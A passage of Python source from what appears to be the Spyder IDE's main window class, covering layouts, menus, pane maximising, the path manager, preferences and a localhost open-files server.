self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(
self,
_("Warning"),
_("<b>%s</b> will be overwritten. Do you want to "
"continue?") % name,
QMessageBox.Yes | QMessageBox.No
)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make a new layout active, even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
CONF.set('quick_layouts', 'names', names)
CONF.set('quick_layouts', 'order', order)
CONF.set('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
section = 'quick_layouts'
names = CONF.get(section, 'names')
order = CONF.get(section, 'order')
active = CONF.get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
CONF.set(section, 'names', dlg.names)
CONF.set(section, 'order', dlg.order)
CONF.set(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The default layouts will always be regenerated unless there was
# an overwrite, either by rewriting with the same name, or by deleting
# and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (i.e., where the index is greater than the number of
# defaults). See spyder-ide/spyder#6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
action = plugin._toggle_view_action
except AttributeError:
# New API
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
self.editor.refresh_formatter_name()
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is a submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is a submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled(
readwrite_editor and widget.document().isUndoAvailable())
self.redo_action.setEnabled(
readwrite_editor and widget.document().isRedoAvailable())
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'ipython_console', 'variable_explorer',
'help', 'plots', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console', None]
for plugin in self.widgetlist:
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if action:
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if isinstance(action, str):
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
if not self.completions.closing_plugin(cancelable):
return False
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.completions.shutdown()
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
except AttributeError:
# Old API
if plugin.isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
def toggle_lock(self, value):
"""Lock/Unlock dockwidgets and toolbars"""
self.interface_locked = value
CONF.set('main', 'panes_locked', value)
self.lock_interface_action.setIcon(
ima.icon('lock' if self.interface_locked else 'lock_open'))
self.lock_interface_action.setText(
_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars"))
# Apply lock to panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
if self.interface_locked:
if plugin.dockwidget.isFloating():
plugin.dockwidget.setFloating(False)
plugin.dockwidget.remove_title_bar()
else:
plugin.dockwidget.set_title_bar()
# Apply lock to toolbars
for toolbar in self.toolbarslist:
if self.interface_locked:
toolbar.setMovable(False)
else:
toolbar.setMovable(True)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
plugin.dockwidget.hide()
try:
# New API
if plugin.get_widget().isAncestorOf(focus_widget):
self.last_plugin = plugin
except Exception:
# Old API
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
            # Only plugins that have a dockwidget are part of widgetlist,
            # so last_plugin can be None after the above "for" loop.
            # For example, this happens if, after Spyder has started, focus
            # is set to the Working directory toolbar (which doesn't have
            # a dockwidget) and then you press the Maximize button.
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
try:
# New API
self.setCentralWidget(self.last_plugin.get_widget())
except AttributeError:
# Old API
self.setCentralWidget(self.last_plugin)
self.last_plugin._ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
try:
# New API
self.last_plugin.get_widget().show()
self.last_plugin.change_visibility(True)
except AttributeError:
# Old API
self.last_plugin.show()
self.last_plugin._visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
try:
# New API
self.last_plugin.dockwidget.setWidget(
self.last_plugin.get_widget())
except AttributeError:
# Old API
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
try:
# New API
self.last_plugin.get_widget().is_maximized = False
except AttributeError:
# Old API
self.last_plugin._ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
try:
# New API
self.last_plugin.get_widget().get_focus_widget().setFocus()
except AttributeError:
# Old API
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.fullscreen_flag:
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.fullscreen_flag:
self.fullscreen_flag = False
if os.name == 'nt':
self.setWindowFlags(
self.windowFlags()
^ (Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint))
self.setGeometry(self.saved_normal_geometry)
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.saved_normal_geometry = self.normalGeometry()
if os.name == 'nt':
# Due to limitations of the Windows DWM, compositing is not
# handled correctly for OpenGL based windows when going into
# full screen mode, so we need to use this workaround.
# See spyder-ide/spyder#4291.
self.setWindowFlags(self.windowFlags()
| Qt.FramelessWindowHint
| Qt.WindowStaysOnTopHint)
screen_number = QDesktopWidget().screenNumber(self)
if screen_number < 0:
screen_number = 0
r = QApplication.desktop().screenGeometry(screen_number)
self.setGeometry(
r.left() - 1, r.top() - 1, r.width() + 2, r.height() + 2)
self.showNormal()
else:
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def show_about(self):
"""Show About Spyder dialog box"""
from spyder.widgets.about import AboutDialog
abt = AboutDialog(self)
abt.show()
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(self)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.show()
@Slot()
def report_issue(self):
"""Report a Spyder issue to github."""
from spyder.widgets.reporterror import SpyderErrorDialog
self._report_dlg = SpyderErrorDialog(self, is_report=True)
self._report_dlg.set_color_scheme(CONF.get('appearance', 'selected'))
self._report_dlg.show()
@Slot()
def trouble_guide(self):
"""Open Spyder troubleshooting guide in a web browser."""
url = QUrl(__trouble_url__)
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
"""Open Spyder Google Group in a web browser."""
url = QUrl(__forum_url__)
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
        Execute lines in the IPython console and optionally set focus
        to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
            OrderedDict([('/some/path', True), ('/some/other/path', False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
        for path, active in reversed(list(new_path_dict_p.items())):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
@Slot()
def win_env(self):
"""Show Windows current user environment variables."""
self.dialog_manager.show(WinUserEnvDialog(self))
# --- Kite
def show_kite_installation(self):
"""Show installation dialog for Kite."""
self.completions.get_client('kite').show_installation_dialog()
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
style_name = CONF.get('appearance', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage'),
(self.clock_status, 'clock')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
# Update interpreter status widget
if self.interpreter_status:
interpreter = self.maininterpreter.get_interpreter()
self.interpreter_status.update_interpreter(interpreter)
else:
return
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
from spyder.preferences.configdialog import ConfigDialog
def _dialog_finished(result_code):
"""Restore preferences dialog instance variable."""
self.prefs_dialog_instance = None
if self.prefs_dialog_instance is None:
dlg = ConfigDialog(self)
dlg.setStyleSheet("QTabWidget::tab-bar {"
"alignment: left;}")
self.prefs_dialog_instance = dlg
# Setup
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
widget = self.completions._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
for completion_plugin in self.completions.clients.values():
completion_plugin = completion_plugin['plugin']
widget = completion_plugin._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
for plugin in [self.appearance,
self.run,
self.maininterpreter,
self.shortcuts,
self.workingdirectory,
self.editor,
self.projects,
self.ipyconsole,
self.historylog,
self.help,
self.variableexplorer,
self.onlinehelp,
self.explorer,
self.findinfiles] + self.thirdparty_plugins:
if plugin is not None:
# New API
if getattr(plugin, 'CONF_WIDGET_CLASS', None):
try:
widget = self.create_plugin_conf_widget(plugin)
if widget is not None:
dlg.add_page(widget)
except Exception:
# Avoid a crash at startup if a plugin's config
# page fails to load.
traceback.print_exc(file=sys.stderr)
# Old API
try:
widget = plugin._create_configwidget(dlg, self)
if widget is not None:
dlg.add_page(widget)
except AttributeError:
pass
except Exception:
# Avoid a crash at startup if a plugin's config
# page fails to load.
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
# Check settings and show dialog
dlg.show()
dlg.check_all_settings()
# Signals
dlg.finished.connect(_dialog_finished)
dlg.pages_widget.currentChanged.connect(
self.__preference_page_changed)
dlg.size_change.connect(self.set_prefs_size)
else:
self.prefs_dialog_instance.show()
self.prefs_dialog_instance.activateWindow()
self.prefs_dialog_instance.raise_()
self.prefs_dialog_instance.setFocus()
def __preference_page_changed(self, index):
"""Preference page index has changed."""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
        while True:
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
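    # Client-side counterpart (illustrative sketch, not part of this class):
    # another Spyder process can ask this running instance to open a file by
    # sending the filename over the same localhost port, roughly:
    #     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #     sock.connect(('127.0.0.1', CONF.get('main', 'open_files_port')))
    #     sock.sendall(fname.encode('utf-8'))
    #     sock.recv(1)  # wait for the b' ' acknowledgement sent above
    #     sock.close()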
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
        Quit Spyder, reset it to default settings and restart the application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
        Quit and restart the Spyder application.
        If reset is True, Spyder settings are reset to defaults on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
